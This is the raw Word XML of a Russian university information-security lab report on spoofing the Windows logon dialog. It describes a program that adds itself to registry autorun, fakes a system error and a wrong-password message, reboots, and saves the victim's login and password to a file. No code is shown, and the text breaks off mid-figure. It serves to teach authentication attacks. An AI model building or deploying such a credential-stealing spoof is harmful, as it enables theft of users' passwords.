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E64A4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14:paraId="64C7D50C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C6615B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C6615B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="00FF6364" w:rsidRPr="00FF6364">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Петра Великого</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614515BC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14:paraId="325FA81C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r w:rsidR="006E2B77">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>кибербезопасности и защиты информации</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0481">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC119B5" w14:textId="77777777" w:rsidR="00C53ADA" w:rsidRDefault="00C53ADA" w:rsidP="00C53ADA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D03FEEE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1D57E9EC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0B5C725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68A5AA0F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679F690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7FF4C87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6CBBEC2D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0605DEE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C003660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7F32BC3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86B932A" w14:textId="7CDF3A44" w:rsidR="00830F2D" w:rsidRPr="00601F8B" w:rsidRDefault="00FB359E" w:rsidP="00830F2D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 w:rsidR="00601F8B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> РАБОТА</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> № </w:t>
      </w:r>
      <w:r w:rsidR="00CD0D2F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F9934B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4E946057" w14:textId="4100E618" w:rsidR="00601F8B" w:rsidRPr="00601F8B" w:rsidRDefault="00FB359E" w:rsidP="00601F8B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6A0481">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="007160DD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Механизм аутентификации пользователей</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0481">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D40B702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26B9938E" w14:textId="3AC8F453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CD0D2F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Основы информационной безопасности</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0481">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385E8188" w14:textId="77777777" w:rsidR="00C53ADA" w:rsidRDefault="00C53ADA" w:rsidP="00C53ADA"/>
    <w:p w14:paraId="1C9C1B2C" w14:textId="77777777" w:rsidR="00C53ADA" w:rsidRDefault="00C53ADA" w:rsidP="00C53ADA"/>
    <w:p w14:paraId="2BCB1584" w14:textId="77777777" w:rsidR="00830F2D" w:rsidRDefault="00830F2D" w:rsidP="00C53ADA"/>
    <w:p w14:paraId="29053B14" w14:textId="77777777" w:rsidR="00830F2D" w:rsidRDefault="00830F2D" w:rsidP="00C53ADA"/>
    <w:p w14:paraId="48B824BD" w14:textId="77777777" w:rsidR="00830F2D" w:rsidRDefault="00830F2D" w:rsidP="00C53ADA"/>
    <w:p w14:paraId="5B664285" w14:textId="77777777" w:rsidR="00C53ADA" w:rsidRPr="00B57B60" w:rsidRDefault="00C53ADA" w:rsidP="003C218B">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24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14:paraId="7D12DCAD" w14:textId="2A422596" w:rsidR="00C53ADA" w:rsidRPr="00B57B60" w:rsidRDefault="00961BBB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Pr="007160DD">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007160DD">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>4831001/10003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411D51">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Улановский </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00411D51">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Г.А</w:t>
      </w:r>
      <w:r w:rsidR="007160DD">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="57A8DC6C" w14:textId="77777777" w:rsidR="00C53ADA" w:rsidRPr="00B57B60" w:rsidRDefault="00C53ADA" w:rsidP="003C218B">
      <w:pPr>
        <w:pStyle w:val="af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</w:t>
      </w:r>
      <w:r w:rsidR="003C218B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">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14:paraId="041CF394" w14:textId="77777777" w:rsidR="000F71FD" w:rsidRDefault="000F71FD" w:rsidP="003C218B">
      <w:pPr>
        <w:pStyle w:val="af3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65B92E29" w14:textId="77777777" w:rsidR="00C53ADA" w:rsidRPr="00B57B60" w:rsidRDefault="000F71FD" w:rsidP="003C218B">
      <w:pPr>
        <w:pStyle w:val="af3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14:paraId="0C2CB9FB" w14:textId="77777777" w:rsidR="00C53ADA" w:rsidRPr="00B57B60" w:rsidRDefault="00C93DCC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C93DCC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>асс. преподавателя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6E2B77">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Панков </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="006E2B77">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>И.Д.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2AE798EB" w14:textId="77777777" w:rsidR="00C53ADA" w:rsidRPr="00C53ADA" w:rsidRDefault="00C53ADA" w:rsidP="003C218B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</w:t>
      </w:r>
      <w:r w:rsidR="003C218B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">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14:paraId="11E234D5" w14:textId="77777777" w:rsidR="00C53ADA" w:rsidRPr="00B57B60" w:rsidRDefault="00C53ADA" w:rsidP="00C53ADA">
      <w:pPr>
        <w:pStyle w:val="af3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2E119178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73066402" w14:textId="77777777" w:rsidR="00C53ADA" w:rsidRDefault="00C53ADA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5737A280" w14:textId="77777777"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0C61F96C" w14:textId="77777777"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25AA4D72" w14:textId="77777777"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1169E483" w14:textId="77777777"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26701DC1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36323660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3F5CE2BB" w14:textId="5C7ABF27" w:rsidR="00C93DCC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</w:t>
      </w:r>
      <w:r w:rsidR="007160DD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>022</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69730250" w14:textId="77777777" w:rsidR="00C93DCC" w:rsidRDefault="00C93DCC">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2CA3DB" w14:textId="77777777" w:rsidR="00601F8B" w:rsidRPr="00D740EB" w:rsidRDefault="00C93DCC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 w:rsidRPr="00D740EB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Цель работы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BC83A8" w14:textId="234625C3" w:rsidR="00C93DCC" w:rsidRPr="007160DD" w:rsidRDefault="007160DD" w:rsidP="007160DD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Получение навыков защиты информационных систем путем проверки подлинности пользователей, исследование проблемы подмены механизма аутентификации в операционной системе </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="007160DD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1913AB49" w14:textId="77777777" w:rsidR="00C93DCC" w:rsidRDefault="00C93DCC" w:rsidP="00C93DCC">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="229ECE89" w14:textId="77777777" w:rsidR="00C93DCC" w:rsidRPr="00C93DCC" w:rsidRDefault="00C93DCC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Постановка задачи</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0887A8B6" w14:textId="54716E91" w:rsidR="00C93DCC" w:rsidRPr="007160DD" w:rsidRDefault="007160DD" w:rsidP="007160DD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Разработать программу, имитирующую </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>logon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">-диалог в операционной системе </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="007160DD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575FFEAB" w14:textId="77777777" w:rsidR="00C93DCC" w:rsidRDefault="00C93DCC" w:rsidP="00C93DCC">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18B9DAF0" w14:textId="371C396A" w:rsidR="00C93DCC" w:rsidRPr="00C93DCC" w:rsidRDefault="007160DD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Выполнение работы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF3CBA8" w14:textId="33DCB1B6" w:rsidR="00C93DCC" w:rsidRDefault="007160DD" w:rsidP="00C93DC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Для имитирования </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>logon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>-диалога был</w:t>
      </w:r>
      <w:r w:rsidR="00411D51">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">о разработано </w:t>
      </w:r>
      <w:r w:rsidR="00411D51">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00411D51" w:rsidRPr="00411D51">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00411D51">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Forms</w:t>
      </w:r>
      <w:r w:rsidR="00411D51" w:rsidRPr="00411D51">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00411D51">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>приложение</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Приложение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="007160DD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="009E5E8C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>. При запуске он</w:t>
      </w:r>
      <w:r w:rsidR="00411D51">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidR="009E5E8C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00411D51">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>добавляет</w:t>
      </w:r>
      <w:r w:rsidR="009E5E8C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> путь к себе в каталог реестра, отвечающий за автозагрузку</w:t>
      </w:r>
      <w:r w:rsidR="002C4D0E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00411D51">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>для</w:t>
      </w:r>
      <w:r w:rsidR="002C4D0E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> автоматическ</w:t>
      </w:r>
      <w:r w:rsidR="00411D51">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ого</w:t>
      </w:r>
      <w:r w:rsidR="002C4D0E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> запуска при входе в </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002C4D0E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>систему</w:t>
      </w:r>
      <w:r w:rsidR="00411D51">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00411D51">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00411D51">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>рис.1)</w:t>
      </w:r>
      <w:r w:rsidR="009E5E8C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740B4A03" w14:textId="7CE2E5C5" w:rsidR="002C4D0E" w:rsidRDefault="00C74206" w:rsidP="002C4D0E">
      <w:pPr>
        <w:keepNext/>
        <w:suppressAutoHyphens/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13C44A04" wp14:editId="0FCFD68E">
            <wp:extent cx="6299835" cy="4322445"/>
            <wp:effectExtent l="0" t="0" r="5715" b="190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34DA" w14:textId="24AE63C1" w:rsidR="009E5E8C" w:rsidRDefault="009E5E8C" w:rsidP="009E5E8C">
      <w:pPr>
        <w:pStyle w:val="aff"/>
        <w:ind w:firstLine="0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9E5E8C"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 w:rsidRPr="009E5E8C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="009E5E8C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="009E5E8C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0072210F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="009E5E8C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009E5E8C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D3309C" w:rsidRPr="000123A7">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00D3309C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009E5E8C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Автозагрузка в реестре</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEE4FC1" w14:textId="49EB90BB" w:rsidR="002C4D0E" w:rsidRDefault="002C4D0E" w:rsidP="002C4D0E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>При входе в систему нам выходит окно о системной ошибке (рис.</w:t>
      </w:r>
      <w:r w:rsidR="007A0C51">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05069953" w14:textId="084015A8" w:rsidR="002C4D0E" w:rsidRDefault="00223972" w:rsidP="002C4D0E">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00223972">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D8B88DA" wp14:editId="3C46A83B">
            <wp:extent cx="5298688" cy="3962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466" cy="39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2E52" w14:textId="260C20FE" w:rsidR="002C4D0E" w:rsidRDefault="002C4D0E" w:rsidP="002C4D0E">
      <w:pPr>
        <w:pStyle w:val="aff"/>
        <w:ind w:firstLine="0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2C4D0E"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 w:rsidR="007A0C51">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="002C4D0E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D3309C" w:rsidRPr="000123A7">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="002C4D0E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Сообщение об ошибке</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77486004" w14:textId="2D274032" w:rsidR="002C4D0E" w:rsidRDefault="00FB7563" w:rsidP="002C4D0E">
      <w:r>
        <w:t xml:space="preserve">При нажатии кнопки ОК выходит окно для ввода логина и пароля (рис. </w:t>
      </w:r>
      <w:r w:rsidR="007A0C51">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A013491" w14:textId="0E51DCCE" w:rsidR="00FB7563" w:rsidRDefault="0025510F" w:rsidP="00FB7563">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0025510F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75907611" wp14:editId="583FCE74">
            <wp:extent cx="4770154" cy="3562350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12" name="Рисунок 12" descr="Изображение выглядит как текст, трава, зеленый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трава, зеленый, внешни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6369" cy="35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D71C" w14:textId="6B4E8204" w:rsidR="00FB7563" w:rsidRDefault="00FB7563" w:rsidP="00FB7563">
      <w:pPr>
        <w:pStyle w:val="aff"/>
        <w:ind w:firstLine="0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FB7563"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 w:rsidR="007A0C51">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB7563">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D3309C" w:rsidRPr="000123A7">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00D3309C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> О</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB7563">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>кно для ввода логина и пароля</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0408D46D" w14:textId="73F10693" w:rsidR="00FB7563" w:rsidRPr="00FB7563" w:rsidRDefault="00FB7563" w:rsidP="00FB7563">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>После ввода логина и пароля пользователю выходит сообщение о неверно введенном логине или пароле</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB7563">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(рис. </w:t>
      </w:r>
      <w:r w:rsidR="007A0C51">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) и </w:t>
      </w:r>
      <w:r w:rsidR="00DE5979">
        <w:t>компьютер перезагружается</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC22723" w14:textId="2FCFD53F" w:rsidR="00FB7563" w:rsidRDefault="0025510F" w:rsidP="00FB7563">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0025510F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="533497CB" wp14:editId="208C8F66">
            <wp:extent cx="6299835" cy="4697095"/>
            <wp:effectExtent l="0" t="0" r="5715" b="8255"/>
            <wp:docPr id="13" name="Рисунок 13" descr="Изображение выглядит как текст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электроника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9599" w14:textId="27A7A44A" w:rsidR="00FB7563" w:rsidRDefault="00FB7563" w:rsidP="00FB7563">
      <w:pPr>
        <w:pStyle w:val="aff"/>
        <w:ind w:firstLine="0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FB7563"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 w:rsidR="007A0C51">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB7563">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D3309C" w:rsidRPr="000123A7">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB7563">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Сообщение о неверном логине или пароле</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDF86E4" w14:textId="6C3F2B75" w:rsidR="00F51D0E" w:rsidRDefault="00F51D0E" w:rsidP="00F51D0E">
      <w:r>
        <w:t xml:space="preserve">Итак, пользователь успешно входит в систему, а нам в заранее установленный файл записываются его данные (логин и пароль), которые он вводил нам в программу (рис. </w:t>
      </w:r>
      <w:r w:rsidR="007A0C51">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF43236" w14:textId="3C4687D5" w:rsidR="00F51D0E" w:rsidRDefault="00BE039B" w:rsidP="00F51D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9A3E9D" wp14:editId="26AFAB2C">
